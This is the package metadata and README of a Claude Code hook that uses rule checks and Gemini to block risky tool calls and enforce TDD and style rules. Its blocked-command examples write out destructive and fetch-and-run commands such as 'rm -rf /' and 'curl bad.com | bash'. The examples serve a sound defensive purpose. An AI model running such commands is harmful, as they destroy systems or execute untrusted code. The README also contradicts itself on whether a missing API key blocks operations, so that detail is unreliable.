Metadata-Version: 2.4
Name: claude-code-adk-validator
Version: 1.5.0
Summary: Hybrid security + TDD validation for Claude Code with automatic test result capture using Google Gemini
Project-URL: Homepage, https://github.com/jihunkim0/jk-hooks-gemini-challenge
Project-URL: Repository, https://github.com/jihunkim0/jk-hooks-gemini-challenge.git
Project-URL: Issues, https://github.com/jihunkim0/jk-hooks-gemini-challenge/issues
Project-URL: Documentation, https://github.com/jihunkim0/jk-hooks-gemini-challenge#readme
Author-email: Jihun Kim <jihunkim0@noreply.github.com>
License-Expression: MIT
License-File: LICENSE
Keywords: adk,ai-safety,claude-code,gemini,hooks,security,tdd,test-driven-development,validation
Classifier: Development Status :: 5 - Production/Stable
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Quality Assurance
Classifier: Topic :: Software Development :: Testing
Requires-Python: >=3.10
Requires-Dist: google-genai>=1.25.0
Requires-Dist: pydantic>=2.0.0
Provides-Extra: dev
Requires-Dist: black>=23.0.0; extra == 'dev'
Requires-Dist: mypy>=1.0.0; extra == 'dev'
Requires-Dist: pytest>=7.0.0; extra == 'dev'
Requires-Dist: ruff>=0.1.0; extra == 'dev'
Description-Content-Type: text/markdown

# Claude Code ADK-Inspired Validation Hooks

Intelligent security validation for Claude Code tool execution using Google Gemini and ADK-inspired patterns.

## Overview

This project implements sophisticated PreToolUse hooks for Claude Code that leverage Google's Gemini API to intelligently validate tool executions before they run. Based on Google Agent Development Kit (ADK) `before_tool_callback` patterns, it provides multi-tier validation with real-time threat intelligence.

## Features

### Multi-Tier Security Validation
- **Tier 1**: Fast rule-based validation for immediate threat detection
- **Tier 2**: Advanced Gemini-powered analysis with structured output
- **Tier 3**: Enhanced file analysis using Gemini Files API

### 🚀 Hybrid Security + TDD Validation (v1.5.0 - Latest)
Complete hybrid validation system combining security validation with TDD enforcement:
- **Security-First**: Multi-tier security validation runs first (proven)
- **TDD Compliance**: Red-Green-Refactor cycle enforcement with single test rule
- **Context Persistence**: Test results, todos, and modifications stored in `.claude/adk-validator/data/`
- **Automatic Test Capture**: Built-in pytest plugin for seamless test result integration
- **Operation-Specific Analysis**: Dedicated validation for Edit/Write/MultiEdit/Update operations
- **TodoWrite Optimization**: Skips validation for better flow (context still persisted)
- **Sequential Pipeline**: Security validation → TDD validation → Result aggregation
- **Smart TDD Detection**: Automatically detects test files and validates test count
- **No-Comments Enforcement**: Blocks code with comments to promote self-evident code
- **SOLID Principles Validation**: Enforces SRP, OCP, LSP, ISP, DIP principles
- **Comprehensive Testing**: Parallel test execution completes in ~30 seconds
- **Pre-commit Hooks**: Automated validation before commits

### 🔍 Advanced Capabilities
- **Structured Output**: Pydantic models ensure reliable JSON responses
- **Deep Thinking Analysis**: 24576 token thinking budget for complex security reasoning
- **File Upload Analysis**: Enhanced security analysis for large files (>500 chars)
- **Document Processing**: Comprehensive analysis of file contents with detailed explanations
- **Precise Secret Detection**: Improved patterns with reduced false positives
- **Simplified UX Output**: Actionable-first design with cleaner, more concise messages
- **Full Context Analysis**: No truncation limits - complete conversation context provided to LLM
- **Configurable Models**: Uses lighter gemini-2.5-flash for file categorization

### 🚫 Security Patterns Detected
- Destructive commands (`rm -rf /`, `mkfs`, `dd`)
- Real credential assignments (quoted values, specific formats)
- Shell injection patterns
- Path traversal attempts
- Malicious download patterns (`curl | bash`)
- System directory modifications
- AWS keys, JWTs, GitHub tokens, and other known secret formats

### ⚡ Tool Enforcement (Blocked Commands)
- **Comments in code** → Enforces self-evident code without comments
- **grep** → Enforces `rg` (ripgrep) for better performance
- **find** → Enforces `rg --files` alternatives for modern searching
- **python/python3** → Enforces `uv run python` for proper dependency management
- **File redirects** → Enforces Write/Edit tools for file operations:
  - `cat > file` → Use Write tool for creating files
  - `echo text >> file` → Use Edit tool for appending to files
  - `sed -i` → Use Edit tool for in-place modifications

## Installation

### Quick Start with uvx (Recommended)

```bash
# Install and run directly with uvx
uvx claude-code-adk-validator --setup

# Or install globally
uv tool install claude-code-adk-validator
```

### Prerequisites
- Python 3.10+
- `uv` package manager
- Google Gemini API access

### Manual Installation

1. **Clone and setup environment:**
```bash
git clone https://github.com/jihunkim0/jk-hooks-gemini-challenge.git
cd jk-hooks-gemini-challenge
uv sync
```

2. **Configure environment:**
```bash
export GEMINI_API_KEY="your_actual_gemini_api_key"
```

3. **Configure Claude Code hooks:**
Create/update `.claude/settings.local.json`:
```json
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Write|Edit|Bash|MultiEdit|Update|TodoWrite",
        "hooks": [
          {
            "type": "command",
            "command": "uvx claude-code-adk-validator",
            "timeout": 8000
          }
        ]
      }
    ]
  }
}
```

### Alternative: Local Development Setup
For development or custom modifications:
```json
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Write|Edit|Bash|MultiEdit|Update|TodoWrite",
        "hooks": [
          {
            "type": "command",
            "command": "uvx --from . claude-code-adk-validator",
            "timeout": 8000
          }
        ]
      }
    ]
  }
}
```

## Usage

The validator automatically intercepts Claude Code tool executions:

### ✅ **Allowed Operations**
```bash
# Safe file operations
Write: Create documentation, code files
Edit: Modify existing files safely
Update: Replace entire file content safely
Bash: ls, git, npm, pip commands

# Documentation examples (allowed)
GEMINI_API_KEY="your_key_here"  # Variable names in docs
export API_KEY="YOUR_API_KEY"   # Placeholder values

# Self-evident code without comments
def calculate_area(length, width):
    return length * width
```

### 🚫 **Blocked Operations**
```bash
# Dangerous commands
rm -rf /           # ❌ Blocked - Destructive
curl bad.com | bash # ❌ Blocked - Malicious download
sudo rm /etc/*     # ❌ Blocked - System modification

# Tool enforcement (modern alternatives required)
grep pattern file.txt    # ❌ Blocked - Use 'rg' instead
find . -name "*.py"      # ❌ Blocked - Use 'rg --files -g "*.py"' instead
python script.py         # ❌ Blocked - Use 'uv run python script.py' instead

# Real credential assignments (quoted, 20+ chars)
api_key = "sk_live_1234567890abcdef..."  # ❌ Blocked - Real secret
password = "actualLongPasswordValue123"  # ❌ Blocked - Real password

# Code with comments (v1.5.0)
def add(a, b):
    # This is a comment            # ❌ Blocked - No comments allowed
    return a + b  # inline comment  # ❌ Blocked - Self-evident code required
```

### 📊 **Response Codes**
- `Exit 0`: Operation approved
- `Exit 2`: Operation blocked (with comprehensive analysis in stderr)

### 📋 **Enhanced Analysis Output**

When operations are blocked, the validator provides clear, actionable feedback:

```
❌ File write operation detected in bash command. Use Write tool for creating files instead.

→ Use Write tool for creating files
```

For more complex blocks with additional context:

```
❌ Dangerous command pattern detected: potentially destructive operation

→ Use 'rm' with specific paths instead of root directory
→ Consider using trash-cli for safer deletions

Details:
• Command attempts to remove entire filesystem
• Would cause complete system failure
• No recovery possible without backups

File issues found:
• Potential shell injection vulnerability
• Hardcoded credentials detected
```

**Key UX Improvements (v1.5.0):**
- **Actionable First**: Suggestions appear immediately after the reason
- **Clean Format**: No redundant DECISION/RISK_LEVEL headers
- **Progressive Detail**: Essential info first, details only when needed
- **Clear Visual Cues**: Clean output without emojis, → for suggestions, • for details
- **Consolidated Sections**: Multiple analysis sections merged into "Details"

## Testing

### Quick Tests
Run basic validation tests:

```bash
# Basic test suite
uv run python tests/test_validation.py

# Code quality checks
uvx ruff check claude_code_adk_validator/
uvx mypy claude_code_adk_validator/
uvx black --check claude_code_adk_validator/
```

### Comprehensive Testing Suite (v1.5.0)
Run full parallel test suite (~30 seconds):

```bash
# Run comprehensive tests with parallel execution
./scripts/run-comprehensive-tests.sh

# Or run individual test modules
uv run python tests/test_quick_validation.py         # Quick tests (no API)
uv run python tests/test_comprehensive_validation.py  # Full validation tests
uv run python tests/test_tdd_enforcement.py          # TDD validation tests
uv run python tests/test_file_categorization.py      # File categorization tests
```

### Pre-commit Hooks
The project includes comprehensive pre-commit hooks for code quality:

```bash
# Install pre-commit hooks (one-time setup)
uv run pre-commit install

# Run hooks manually
uv run pre-commit run --all-files

# Hooks automatically run on git commit
git commit -m "your message"
```

Pre-commit hooks include:
- Quick validation tests (no LLM calls)
- Comprehensive validation tests (with GEMINI_API_KEY)
- Ruff linting
- MyPy type checking
- Black code formatting
- YAML/JSON/TOML validation

## Automatic Test Result Capture

### Python Projects (Built-in)

The validator automatically captures pytest results when you install the package:

```bash
# Install with uvx (automatic pytest plugin registration)
uvx claude-code-adk-validator --setup

# Run tests - results automatically captured for TDD validation
pytest

# Results stored in .claude/adk-validator/data/test.json (20-minute expiry)
```

### Multi-Language Support ✅ IMPLEMENTED

The system now supports automatic test result capture for multiple languages using the CLI:

```bash
# List all supported languages
uvx claude-code-adk-validator --list-languages
```

#### TypeScript/JavaScript
```bash
# Capture Jest/Vitest results
npm test -- --json | uvx claude-code-adk-validator --capture-test-results typescript

# Or for Vitest
vitest run --reporter=json | uvx claude-code-adk-validator --capture-test-results typescript
```

#### Go
```bash
# Capture go test results
go test -json ./... | uvx claude-code-adk-validator --capture-test-results go
```

#### Rust
```bash
# Capture cargo test results
cargo test --message-format json | uvx claude-code-adk-validator --capture-test-results rust

# Note: Requires nightly for stable JSON output
cargo +nightly test -- -Z unstable-options --format json | uvx claude-code-adk-validator --capture-test-results rust
```

#### Dart/Flutter
```bash
# Capture dart test results
dart test --reporter json | uvx claude-code-adk-validator --capture-test-results dart

# Or for Flutter
flutter test --machine | uvx claude-code-adk-validator --capture-test-results flutter
```


### Test Result Format

All test integrations use this standardized JSON format:

```json
{
  "timestamp": 1640995200.0,
  "expiry": 1640996400.0,
  "test_results": {
    "status": "failed|passed|no_tests",
    "total_tests": 10,
    "passed": 8,
    "failed": 2,
    "skipped": 0,
    "duration": 5.2,
    "failures": [
      {
        "test": "test_example",
        "file": "tests/test_example.py",
        "error": "AssertionError: Expected 5, got 3",
        "line": 42
      }
    ],
    "passes": [
      {
        "test": "test_working_feature",
        "file": "tests/test_feature.py",
        "duration": 0.1
      }
    ]
  }
}
```

## Architecture

### Core Components

1. **ClaudeToolValidator** (`claude_code_adk_validator/validator.py`)
   - Main validation engine with enhanced analysis capabilities
   - File upload and comprehensive security analysis
   - Structured output generation with detailed reasoning
   - Improved secret detection with context awareness
   - Full context processing (no truncation limits)

2. **Validation Tiers**
   - **Quick validation**: Rule-based pattern matching (<100ms)
   - **Gemini analysis**: Deep LLM-powered threat assessment (~3s)
   - **File analysis**: Enhanced security scanning for large files (~5s)

3. **Enhanced Security Models**
   - `ValidationResponse`: Comprehensive analysis with thinking process, detailed analysis, and full context
   - `FileAnalysisResponse`: Deep file security analysis with vulnerability identification
   - **New Fields**: `detailed_analysis`, `thinking_process`, `full_context`, `raw_response`

### Secret Detection Improvements

Enhanced patterns with reduced false positives:

- **Word boundaries**: Prevents matching variable names like `GEMINI_API_KEY`
- **Placeholder exclusion**: Ignores `YOUR_API_KEY`, `<SECRET>`, etc.
- **Quoted value requirements**: Focuses on actual string assignments
- **Minimum length**: Requires 20+ characters for generic secrets
- **Specific formats**: Detects AWS keys, JWTs, GitHub tokens directly

### ADK Integration Patterns

Following Google ADK `before_tool_callback` methodology:

```python
def before_tool_callback(self, tool_request: dict) -> Optional[dict]:
    """ADK-inspired validation returning None (allow) or error dict (block)"""
    validation_result = self.validate_tool_use(tool_name, tool_input, context)
    return None if validation_result["approved"] else {"error": validation_result["reason"]}
```

## Configuration

### Environment Variables
- `GEMINI_API_KEY`: **REQUIRED** - Operations are blocked without valid API key
- No fail-safe mode - security and TDD validation require API access

### Hook Configuration
- **Matcher**: `Write|Edit|Bash|MultiEdit|Update|TodoWrite` - Tools to validate
- **Timeout**: 8000ms - Adequate for LLM analysis and file upload
- **Command**: Full path to validator script or uvx command

### Model Settings
- **Model**: `gemini-2.5-pro` - Advanced reasoning capabilities for security analysis
- **Thinking Budget**: 24576 tokens for deep security reasoning and analysis
- **Structured Output**: JSON schema validation via Pydantic models
- **Context Processing**: Full conversation context without truncation limits
- **File Analysis**: Large file security scanning via Gemini Files API

## Development

### Project Structure
```
claude-code-adk-validator/
   claude_code_adk_validator/
      __init__.py           # Package metadata (v1.5.0)
      __main__.py           # Module entry point
      main.py               # CLI entry point and hook setup
      validator.py          # Legacy single-file validator (deprecated)
      security_validator.py # Security-focused validation module
      tdd_validator.py      # TDD compliance validation module
      tdd_prompts.py        # TDD-specific prompt templates
      hybrid_validator.py   # Sequential pipeline orchestrator
      file_storage.py       # Context persistence for TDD state
      prompts/              # Reserved for future prompt templates
      validators/           # Reserved for future validators
   tests/
      test_validation.py    # Comprehensive test suite
      test_tdd_direct.py    # TDD validation test suite
   .claude/
      adk-validator/
         data/
            test.json         # Test results (20-min expiry)
            todos.json        # Todo state tracking
            modifications.json # File modification history
   dist/                    # Built packages
   pyproject.toml           # Package configuration
   mypy.ini                # Type checking configuration
   uv.lock                 # Dependency lock file
   CLAUDE.md               # Development guidance
   CONTRIBUTING.md         # Contribution guidelines
   LICENSE                 # MIT License
   README.md               # This file
```

### Adding New Security Patterns

1. **Rule-based patterns** (Tier 1): Add to `validate_bash_command()` or `validate_file_operation()`
2. **LLM analysis** (Tier 2): Update validation prompt in `build_validation_prompt()`
3. **File analysis** (Tier 3): Enhance `analyze_uploaded_file()` prompt

See [CONTRIBUTING.md](CONTRIBUTING.md) for detailed guidelines.

## Contributing

1. Follow existing code patterns and security principles
2. Add tests for new validation patterns in `tests/`
3. Run quality checks: `uvx ruff`, `uvx mypy`, `uvx black`
4. Update documentation for new features

See [CONTRIBUTING.md](CONTRIBUTING.md) for detailed contribution guidelines.

## Security Considerations

- **Fail-safe**: Missing API key allows operations (prevents lockout)
- **Performance**: Quick validation for common patterns
- **Privacy**: Temporary files cleaned up after analysis
- **Reliability**: Structured output prevents parsing errors
- **Precision**: Improved secret detection reduces false positives

## Hook Behavior & Verification

### Understanding "Silent Success" Design
The validation system follows the "silent on success" principle common in CLI tools:

- **✅ Approved Operations**: Continue silently without any validation output
- **❌ Blocked Operations**: Show detailed error messages with analysis and suggestions

This design keeps the development flow uninterrupted while providing comprehensive feedback only when intervention is needed.

### Verifying Hooks Are Working

To confirm your hooks are active and functioning:

```bash
# Test 1: Try a blocked command (should show error)
grep "pattern" file.txt
# Expected: Error message suggesting 'rg' instead

# Test 2: Try dangerous command (should be blocked)
echo "rm -rf /" # DO NOT RUN - just demonstrates blocking

# Test 3: Safe operations (should proceed silently)
ls -la
rg "pattern" file.txt
uv run python --version
```

### Troubleshooting

If hooks don't seem to trigger:
1. Check `.claude/settings.local.json` contains hook configuration
2. Verify `GEMINI_API_KEY` environment variable is set
3. Confirm you're in the correct directory with `pyproject.toml`
4. Test with commands known to be blocked (grep, python, find)

## Recent Improvements

### Enhanced Validation and Testing (v1.5.0 - Latest)
- **Comprehensive Testing Suite**: Parallel test execution reduces runtime to ~30 seconds
- **Pre-commit Hooks**: Automated validation before commits with quick and comprehensive tests
- **Update Tool Support**: Added Update tool to TDD validation for complete file replacements
- **No-Comments Enforcement**: Blocks code with comments to promote self-evident code
- **SOLID Principles Validation**: Enforces all five SOLID principles (SRP, OCP, LSP, ISP, DIP)
- **Zen of Python Compliance**: Validates code follows Python's guiding principles
- **Prompt Simplification**: Reduced prompt size by ~80% while maintaining functionality
- **Emoji-Free Output**: All validation messages now use clean text formatting
- **Fixed API Conflicts**: Resolved Gemini API tool/JSON response format conflicts

### Hybrid Security + TDD Validation System (v1.1.0)
- **Modular Architecture**: Split monolithic validator into specialized modules (security, TDD, hybrid)
- **TDD Enforcement**: Implemented Red-Green-Refactor cycle with strict single test rule
- **Context Persistence**: Added FileStorage for test results, todos, and modification tracking
- **Sequential Pipeline**: Security validation → TDD validation → Result aggregation
- **Operation-Specific Logic**: Custom validation for Edit/Write/MultiEdit/TodoWrite operations
- **Smart Test Detection**: Automatic test file identification and new test counting
- **Fixed TDD Bug**: Corrected prompt that was allowing multiple tests in test files
- **No Fail-Safe Mode**: Removed fail-safe behavior - operations blocked without API key

### Hook Functionality Verification
- **Confirmed Full Operational Status**: Comprehensive testing validated all hook functionality
- **Silent Success Clarification**: Added documentation explaining when validation output appears
- **Real-world Testing**: Verified hooks work correctly in actual Claude Code operations
- **Troubleshooting Guide**: Added verification steps for users to confirm hook activation

### Enhanced LLM Analysis Output
- **Comprehensive stderr Output**: Structured analysis sections with detailed reasoning
- **Full Context Processing**: Removed 800-character truncation limit for complete conversation analysis
- **Enhanced Response Fields**: Added `detailed_analysis`, `thinking_process`, `full_context`, `raw_response`
- **Fixed File Analysis**: Resolved Gemini Files API integration for proper large file security scanning
- **Deep Thinking Process**: Complete step-by-step security reasoning documentation
- **Educational Feedback**: Detailed explanations of security implications and best practices

### Enhanced Secret Detection (v1.0.3)
- Added word boundaries to prevent false positives on variable names
- Implemented placeholder exclusion for documentation examples
- Focus on quoted values for generic secret patterns
- Added specific patterns for AWS, GitHub, Stripe, Slack tokens
- Reduced false positives while maintaining security coverage

## Roadmap: Hybrid Security + TDD Validation System

### Phase 1: Foundation (v1.1.0) ✅ COMPLETED
**Goal**: Add TDD validation alongside existing security validation

- [x] **FileStorage Implementation**: Added context persistence in `.claude/adk-validator/data/`
  - Test results with 20-minute expiry (similar to TDD Guard)
  - Todo state tracking for TDD workflow awareness
  - File modification history for context aggregation

- [x] **Hook Extension**: Updated matcher to include `TodoWrite` operations
  - Previous: `"Write|Edit|Bash|MultiEdit"`
  - Current: `"Write|Edit|Bash|MultiEdit|TodoWrite"`

- [x] **TDD Validation Logic**: Implemented Red-Green-Refactor cycle enforcement
  - Adopted TDD Guard's core principles and validation rules
  - Added operation-specific analysis (Edit/Write/MultiEdit)
  - Integrated with existing security validation pipeline

### Phase 2: Test Integration (v1.2.0) ✅ COMPLETED
**Goal**: Automatic test result capture and TDD state management

- [x] **Pytest Plugin**: Auto-capture test results via pytest hooks with entry point registration
- [x] **Multi-Language Reporters**: Implemented parsers for Python, TypeScript/JavaScript, Go, Rust, Dart/Flutter
- [x] **CLI Integration**: Added `--capture-test-results` and `--list-languages` flags
- [x] **Test Result Processing**: Standardized JSON format across all languages
- [x] **UX Improvements**: Simplified output format, removed redundant headers, actionable-first design
- [x] **Performance Optimization**: Added FILE_CATEGORIZATION_MODEL using lighter gemini-2.5-flash

### Phase 3: Advanced Features (v1.3.0)
**Goal**: Multi-language support and enhanced validation

- [ ] **Modular Prompt System**: Adopt TDD Guard's operation-specific prompt architecture
- [ ] **TypeScript Support**: Add Vitest integration for JavaScript/TypeScript projects
- [ ] **Enhanced Response Model**: Unified security + TDD analysis in single response

### Architecture Comparison: TDD Guard vs Our System

| Component | TDD Guard | Our System (v1.5.0) |
|-----------|-----------|---------------------|
| **Hook Scope** | `Write\|Edit\|MultiEdit\|TodoWrite` | `Write\|Edit\|Bash\|MultiEdit\|Update\|TodoWrite` |
| **Validation Logic** | Single-purpose TDD | Security → TDD + Comments/SOLID/Zen + Context-Aware |
| **Response Model** | Simple approve/block | Clean, actionable-first output |
| **Context Storage** | `.claude/tdd-guard/data/` | `.claude/adk-validator/data/` |
| **Test Integration** | Auto-reporters (Vitest/pytest) | Full auto-reporters (5 languages) |
| **Architecture** | Modular from start | Modular: security, TDD, hybrid modules + FileContextAnalyzer |
| **Testing** | Basic unit tests | Parallel test suite (~3-5s with 10x speedup) |
| **Pre-commit** | None | Full pre-commit hooks |
| **File Context** | None | Intelligent file categorization (test/config/structural/implementation) |
| **Documentation** | Basic | Pre-push checks for README.md, CLAUDE.md, CHANGELOG.md |

### Implementation Strategy

The hybrid approach leverages our **existing infrastructure strengths**:
- ✅ Sophisticated ValidationResponse model (10+ analysis fields)
- ✅ Multi-tier validation pipeline (rule-based + LLM + file analysis)
- ✅ Advanced prompt engineering with comprehensive analysis
- ✅ Production-ready PreToolUse hook integration

And adds **TDD Guard's proven capabilities**:
- 🔄 Context persistence and state management
- 🔄 Operation-specific validation logic
- 🔄 Test result capture and integration
- 🔄 Red-Green-Refactor cycle enforcement

**Result**: A comprehensive development quality assurance system that provides both security protection and TDD enforcement in a single, unified validation pipeline.

## License

MIT License - See LICENSE file for details
# Test pre-commit hooks
